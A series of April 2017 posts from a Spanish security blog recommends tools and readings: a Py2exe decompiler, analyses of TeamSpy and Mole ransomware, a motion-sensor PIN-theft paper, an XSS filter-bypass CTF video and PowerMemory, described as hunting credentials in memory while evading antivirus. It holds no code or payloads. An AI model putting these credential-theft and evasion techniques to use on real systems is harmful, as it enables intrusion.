  • CVE-2016-5172
  • CVE-2016-5198
  • CVE-2016-5200
  • CVE-2016-7189
  • CVE-2016-7190
  • CVE-2016-7194
  • CVE-2016-7200
  • CVE-2016-7201
  • CVE-2016-7202
  • CVE-2016-7203
  • CVE-2016-7240
  • CVE-2016-7241
  • CVE-2016-7286
  • CVE-2016-7287
  • CVE-2016-7288
  • CVE-2016-7547
  • CVE-2016-7552
  • CVE-2016-8413
  • CVE-2016-8477
  • CVE-2016-8584
  • CVE-2016-8585
  • CVE-2016-8586
  • CVE-2016-8587
  • CVE-2016-8588
  • CVE-2016-8589
  • CVE-2016-8590
  • CVE-2016-8591
  • CVE-2016-8592
  • CVE-2016-8593
  • CVE-2016-9651
  • CVE-2017-0070
  • CVE-2017-0071
  • CVE-2017-0199
  • CVE-2017-0392
  • CVE-2017-0521
  • CVE-2017-0531
  • CVE-2017-0576
  • CVE-2017-2416
  • CVE-2017-2446
  • CVE-2017-2447
  • CVE-2017-2464
  • CVE-2017-2636
  • CVE-2017-5638
  • CVE-2017-7280
  • CVE-2017-7293
Como veis, están bastante al día. Aquí enlace al repositorio de GitHub: 
Sed Buenos ;) 

miércoles, 26 de abril de 2017

rePy2exe.- Ingeniería inversa a Py2exe

Hace mucho os hable del modulo [Py2exe] para Python, el cual nos permitía crear un .exe desde un .py. Bueno, pues resulta que si eres capaz de ver que este archivo ha sido creado con Py2exe puedes "reversearlo" con rey2exe. Una herramienta de [4w4k3] que nos permite ver que demonios esta haciendo el archivo que queramos analizar. 

Es fácil de usar, solo es seguir el menú y decirle en que tipo de extensión ,py queremos que nos deje el código del archivo.


Aix, con lo bien que me lo pasaba yo con Py2exe ahora tendremos que buscar otra forma o hacer algún que otro experimento.  La verdad es que es una herramienta muy útil y que si os gusta Python aprenderéis mucho de como funciona el modulo Py2exe.

Enlace a la herramienta:
Sed Buenos ;)  

martes, 25 de abril de 2017

Infografía.- Ciberinducción al daño físico

La ciberinducción al daño es un termino que he descubierto hoy gracias al Centro Cibernético Policial de Colombia y la verdad es que esta muy ligada al juego [Ballena Azul] ... el cual tristemente no deja de estar en boca de todos últimamente. 

"El término del juego de la ballena azul se refiere a un asunto alegado en una red social rusa conectado con el aumento de suicidios de adolescentes. Se cree que el juego está relacionado con más de un centenar de casos de suicidio en el mundo, teniendo fotos de las heridas autoinfligidas compartidos en redes sociales, junto con hashtags. El término "ballena azul" se refiere al fenómeno de ballenas varadas, que se compara con el suicidio."

El [Centro Cibernético Policial de Colombia] nos ha preparado una infografía para que todos conozcamos las razones y todo lo que esta en nuestras manos para combatirlo, muy recomendable.



Sed Buenos ;)

lunes, 24 de abril de 2017

Vídeo.- Ingeniería inversa de un chip

Si la ingeniería inversa de software es un tema que no acabo de entender y que me cuesta un montón (a lo mejor necesitaría una clase practica ... para acabar de pillarlo), destripar un chip ya me explota la cabeza.Bueno,  soy capaz de entenderlo pero no podría duplicar el experimento. Aunque,  no por eso, no deja de picarme la curiosidad. 

Así que hoy os recomiendo el siguiente vídeo por si tenéis curiosidad de ver como se hace:


Todo lo que corresponde a vulnerabilidades de Hardware es un mundo apasionante y del que no se habla abiertamente pero hay gente muy buena trabajando para encontrarlas y  mejorar nuestra experiencia como consumidores.

Sed Buenos ;) 

domingo, 23 de abril de 2017

Libro.- Hackers, aprende a atacar y a defenderte

Hoy es Sant Jordi por aquí, así que por tradición toca recomendaros algún libro internaste y se me paro a me paro a pensar en un libro que ha marcado mi camino en este mundo es la primera edición de Hackers, aprende a atacar y a defenderte de la editorial Ra-Ma. Este  libro aun lo guardo como si fuera de oro, está lleno de apuntes a lápiz
y de puntos de libro.

Aquí tenéis el enlace a la primera edición: 
Muy recomendable paro si tenéis que hacer la compra yo optaría por su segunda edición donde se habla de herramientas mas nuevas y sigue manteniendo ese fino hilo entre la enseñanza teórica y la práctica que tanto nos gusta al "trastear" con la tecnología. 

Enlace a la segunda edición: 

Sed Buenos ;)

viernes, 21 de abril de 2017

El horror al actualizar el navegador de tu auto.

Pues hoy no esperaba hacer esta entrada y va a ser muy corta, así que agarraos lo que podáis que vamos.

Me acabo de encontrar con el siguiente tweet de Guido van Rossum el creador de Python donde mostraba un video de honda e indicaba que el horror llegaba en el minuto 1:35 y la verdad es que no es para menos ...
El vídeo está oculto en vimeo, [se podrían hacer muchas cosas] pero voy a respetarlo un poco aunque aquí tenéis el enlace:
Entre nosotros, no creo que esta sea la mejor manera de actualizar un coche/auto. A mi se me ocurren 3 vectores de ataque ¿Cuantos se os ocurren a vosotros?

Estoy bastante indignado Honda tiene el suficiente capital como para hacer las cosas bien y poder para contratar a ingenieros capaces de adelantarse a estos problemas. La verdad es que me parece una solución del medievo para un error que puede traer muchos problemas.

Sed Buenos ;)

jueves, 20 de abril de 2017

Vídeo.- Algunos Tips fáciles para estar "seguro"

La verdad es que muchas veces mi nivel de paranoia se ha salido de escala y lo hasta lo he dejado patente en este blog.  Pero la verdad es que si seguimos algunos tips sencillos podemos mejorar nuestra seguridad. Así que hoy os recomiendo el siguiente vídeo de japonton donde nos explica unos tips muy interesantes y creo que merece la pena verlos si no estáis muy metidos en este mundo. Yo cambiaría algunos pero en general merece mucho la pena.



Sed Buenos ;) 

miércoles, 19 de abril de 2017

Como crear tu propio sistema operativo en C/C++

Otra entrada o nota para mi yo de futuro cuando se digne a aprender, de verdad, C o C++ y aunque solo [es la segunda entrada] ya podéis ver por donde van los tiros solo con leer el titulo. No, no aspiro a programar el mejor sistema operativo del universo, solo quiero entender el trabajo que ha detrás de lo que diariamente menospreciamos. Vamos saciar un poco mas mi curiosidad ¿No os parece interesante saber que está corriendo por debajo de vuestra interfaz gráfica? Pues a mi si. 


Así que como nota, hoy quiero recomendaros el libro How to Make a Computer Operating System de Samy Pessé una guía casi paso a paso de como crear un sistema operativo basado en C++ con ejemplos fotos y todo tipo de explicaciones. 

Enlace al libro:


Enlace al GitHub de Samy Pessé:

martes, 18 de abril de 2017

TeamSpy.- Los malos también confían en TeamViewer

Hoy me ha hecho mucha gracia toparme con este malware y no es por que sea una maravilla técnica, que en parte lo es, si no por que utiliza herramientas que todos tenemos muy a mano y que mal utilizadas puede permitir a un atacante tomar el control del equipo de la victima.


A todos nos suena TeamViewer ya, pero para los que seáis mas nuevos en un programa que nos permite tomar el control de un equipo con el consentimiento del receptor. Pues TeamSpy infecta el equipo de la victima engañando a la gente para descargar un archivo adjunto malicioso y pide al usuario que habilite las macros. Después de eso, el malware secretamente instala TeamViewer, dando a los cibercriminales el control total del ordenador infectado.

Como os he dicho, este malware utiliza programas que todos tenemos a nuestro alcance pero, ¿Cómo consigue que la victima no vea que se está instalando el TeamViewer? ¿Cómo sabe el pin que es necesario para realizar dicha conexión?

Para todo eso os recomiendo leer la siguiente entrada del blog de Avast donde lo destripan por completo:



Sed Buenos ;) 

lunes, 17 de abril de 2017

Mole Ransomware y la vuelta al blog.

Después de unos días de vacaciones en los que me han repasado el lomo a base de bien pero me lo he pasado como un chaval, volvemos al blog y como no, con uno de los malwares de moda de este año.  Os hablo del temido Ransomware y mas concretamente de Mole. 

Mole Ransomware es uno de esos malware que llegan por correo electrónico haciéndose pasar por una empresa de mensajería que no ha podido entregarte un paquete. Al abrir este correo y pinchar en el link de mas información. Nos encontramos con un documento en "Word Online" el cual nos pedirá un plugin para poder verlo y si nos descargamos y le damos doble clic al plugin acabaremos infectados por Mole Ransomware cifrando así todos nuestros archivos. 

Mas información y solución a este: 
También y si disponéis de un poco mas de tiempo, aquí tenéis un vídeo donde se destripa este malware en 15 minutos. Así podremos entenderlo del todo y como prevenirnos de el mirando las cabeceras HTTP de los correos que nos llegan. 


Sed Buenos ;)

jueves, 13 de abril de 2017

Paper.- Extracción del PIN mediante los sensores de movimiento de tu Smartphone

Ya ni inclinar el teléfono podemos ya que Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, Feng Hao de la School of Computing Science de la Universidad de Newcastle. Descubrieron en Mayo 2016 que, una vez un usuario visita un sitio web controlado por un atacante, el código incrustado en dicha página comienza a escuchar el movimiento y la información de los sensores de orientación sin necesidad de ningún permiso por parte del usuario. Después se analiza toda eta información y se obtiene el PIN del usuario.


Si tenes curiosidad por como lo han descubierto hoy os recomiendo el siguiente Paper: 

miércoles, 12 de abril de 2017

Inforgrafia.- Robo de contraseñas y como "impedirlo"

Hoy haciendo una búsqueda a infografias antiguas que tenía pendientes de publicar he dado con la página del National Cyber Security Center en la que hay mucha información como por ejemplo la infografia que quiero compartiros sobre que hacer si nos han conseguido pillar una contraseña. 


La verdad es que no es un mal poster para tener en la oficina. No obstante, para mucha mas información y una explicación mas detallada sobre este tema:

martes, 11 de abril de 2017

Palabra de Hacker.- ¿Qué es blockchain?

Estoy ultimando los planes para mi viaje del viernes y queriendo distraerme un poco de todas las cosas que tengo pendiente, me he puesto a escuchar el último programa de Palabra de Hacker que ya junto a Mundo Hacker se ha convertido en un contenido interesante para seguir de forma  periódica. Además hablan sobre Blockchain y ya sabéis que esta tecnología tira fuerte por aquí. 

Muy recomendable, casos reales y una explicación genial sobre todo este mundo: 


Sed Buenos ;) 

lunes, 10 de abril de 2017

Hashea como puedas pero hazlo bien.

Yo no se casi nada sobre funciones de hash, de como se han de programar o de por qué no debemos crear nuestro propio sistema de cifrado. Pero últimamente, con el tema de las colisiones en SHA1, estoy bastante interesado así que, me he buscado un poco la vida, y he ido a parar con la siguiente guía que nos responde a muchas dudas. Sobre todo a mi que soy un novato en esto.


En serio, es buena y empieza desde cero, casi mostrándonos el workflow que hará un usuario al conectarse y los pasos que hará el hash:
  1. El usuario crea una cuenta.
  2. Su contraseña es hasheada y se almacena en la base de datos. En ningún momento la contraseña estará en texto plano (sin cifrar).
  3. Cuando el usuario intenta iniciar sesión, se genera un hash para la contraseña cuando que se indico en el login y se compara con el hash de la contraseña real (recuperado de la base de datos).
  4. Si los hashes coinciden, se le concede acceso al usuario. Si no es así, se le dice al usuario que las credenciales de inicio de sesión no válidas.
  5. Los pasos 3 y 4 se repiten cada vez que alguien intenta acceder a su cuenta.
Después ya entra en buenas practicas y en como se deben solventar ciertos ataques a un nivel mucho mas técnico. Esta guía merece toda mi atención:

domingo, 9 de abril de 2017

HackThis Intermediate 4.- "Tuneando" un XSS

Domingo y día de vídeo son palabras que ya os deberían ir sonando, así que aquí tenéis una nueva solución de HackThis.

En la época en la que estamos, no todas las empresas han tenido el dinero para poder dedicar a la seguridad informática como les gustaría y es posible que hayan tenido que tirar con lo puesto detectando y corrigiendo todo lo posible.

No obstante a veces si no filtras bien ciertos caracteres  podemos manipular un XSS para que no sea parado por el filtre de caracteres y hoy Kazukun nos muestra un ejemplo muy sencillo.


Sed Buenos ;) 

viernes, 7 de abril de 2017

El 14, 15 y 16 de Abril no habrá entrada.

Poco a poco me vais conociendo un poco mas pero pocos me conocéis desde antes de que empezara mis andanzas por el mundo de la seguridad informática. Bueno,  hace ya 4 años, mas o menos, yo era uno de esos chicos al que le encantaban los videojuego e iba a torneos de Street Fighter, a quedadas con gente que jugaba a juegos de lucha y participaba en la comunidad.

Si os sorprenderá que haya una comunidad de gente que queda para jugar a lo que quieren, pero la verdad es que no es tan raro como participar en un CONes de seguridad informática donde hay Hackers que muestran lo que saben.  Hasta teníamos nuestro propio equipo que se llamaba BlueTeam (yo ya apuntaba maneras xD) antes que se pusiera de moda y empezaran a darlo por Moviestar+ 


Así que, después de 4 años sin ir a ningún torneo y necesitando ya unas pequeñas vacaciones, no me he podido resistir a la invitación de un amigo de toda la vida para irme unos días a disfrutar de algo que siempre me ha gustado mucho. 

Por eso los días 14, 15 y 16 de abril no habrá entrada en este blog a no se que haya algo reseñable durante en mi viaje e estrenemos la sección Hacking on the road que llevo tiempo con ella en la mente. 

Sed Buenos y estas avisados.  ;)

jueves, 6 de abril de 2017

Como crear tu propio editor de texto en C

Esto mas que una entrada sobre seguridad informática es la catalogan de un recurso para un proyecto a muy largo plazo, en el cual mi yo del futuro querrá meterse y tendrá que estar preparado para ello. Ademas, encaja muy bien con el espíritu Hacker de querer aprender como funciona todo.


Todo indica que me va a tocar aprender mucho C para mi proyecto, pero valdrá la pena y si cuento con guías como la que os voy a recomendar hoy va ha ser un muy buen tutorial. 

Salvatore Sanfilippo creo un [editor de texto llamado Kilo] con solo 1000 lineas de código en C, muy chulo y minimista en mi opinión,  y en esta guía encontraremos como programarlo nosotros desde 0 con C y a "tunearlo" a nuestro gusto. Muy chula para todos aquellos que como yo no tenga ni idea de C y quieran aprender con un ejemplo practico, realista y que vais a poder usar cuando queráis. 

Enlace a la guía:



Sed Buenos ;)

miércoles, 5 de abril de 2017

Paper,- Data Remanence in Flash Memory Devices

Hace unos días tuve un problema con un SSD el cual no fui capaz de hacer que el equipo lo montara ... así que busqué información pero no logre poder hacer nada y algo me da, que la solución al final pasaba por saber mas sobre electrónica. De esta manera ahora cada información que veo relacionada con este tema es motivo de análisis por mi parte.

Hoy me he encontrado con el siguiente vídeo, la verdad es que no deja de ser un "spot" publicitario pero quiero jugar con esto un día a ver si me funciona.


Ademas, me he acordado de una ponencia de la Blackhat donde se hablaba que no solo se podía recuperar información de los discos y la RAM sino que también ciertos componentes electrónicos también guardaban información jugosa que podíamos extraer en caso de necesidad y buscando mas información, hoy os voy a recomendar un paper que me ha parecido muy interesante, es un como electrónico pero trata sobre la información que aun puede almacenar los transistores que tenemos en nuestros equipos ya que durante el proceso de borrado los no todos los transistores vuelven a su estado inicia. Es un tema muy pero que muy curioso. 

Enlace al paper: 

Sed Buenos ;) 


martes, 4 de abril de 2017

PowerMemory y las credenciales en archivos y memoria

Cada día me sorprende mas lo polivalente que puede llegar a ser PowerShell y me doy cuenta de lo poco que sé de esta super-consola. Hoy, os voy a recomendar PowerMemor. Un "script", aun que llamarle así es quedarse un poco cojo, que nos permite buscar credenciales e información jugosa en los archivos y en la memoria del sistema. 


Es un método que no he visto antes y además, podemos modificar la [user land] y el comportamiento del [kernel land] sin ser detectados por un antivirus o nuevas técnicas de defensa. Vamos, que está muy bien pensado.

Muchas mas información de como es capaz de modificar estos espacion, lo encontrareis en el enlace a la herramienta: 

Sed Buenos ;)